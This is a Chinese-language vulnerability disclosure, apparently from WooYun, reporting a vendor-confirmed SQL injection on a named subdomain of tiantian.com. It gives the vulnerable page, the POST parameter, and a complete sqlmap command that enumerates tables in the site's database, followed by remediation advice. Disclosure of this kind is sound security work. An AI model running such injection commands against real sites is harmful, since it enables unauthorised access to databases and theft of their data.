漏洞概要
关注数(24)
关注此漏洞
漏洞标题:天天网某站SQL注入可导致多个数据库数据泄漏
提交时间:2014-05-01 10:21
修复时间:2014-06-15 10:22
公开时间:2014-06-15 10:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-05-01: 细节已通知厂商并且等待厂商处理中
2014-05-04: 厂商已经确认,细节仅向厂商公开
2014-05-14: 细节向核心白帽子及相关领域专家公开
2014-05-24: 细节向普通白帽子公开
2014-06-03: 细节向实习白帽子公开
2014-06-15: 细节向公众公开
简要描述:
天天网(http://www.tiantian.com)某站存在SQL注入漏洞,可以导致多个数据库的数据泄漏。
详细说明:
存在漏洞的站点:http://help.tiantian.com;
具体的漏洞页面:http://help.tiantian.com/resp/pensong.aspx;
是post类型的,具体的漏洞参数:t=gshi&v=6 参数v存在问题;
SQLMAP注入测试命令:
sqlmap.py -u "http://help.tiantian.com/resp/pensong.aspx" --data="t=gshi&v=6" -p "v" --tables -D newsite --risk 5 --level 5
如图所示:
漏洞证明:
数据库列表:
当前库表名如下:
wooyun上传图片功能挂掉的节奏,所以只好复制了。
修复方案:
1,对参数v进行类型判断,过滤;
2,SQL语句不要拼接,使用存储过程;
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-05-04 10:33
厂商回复:
留个在线联系的方式,发放小礼物
最新状态:
暂无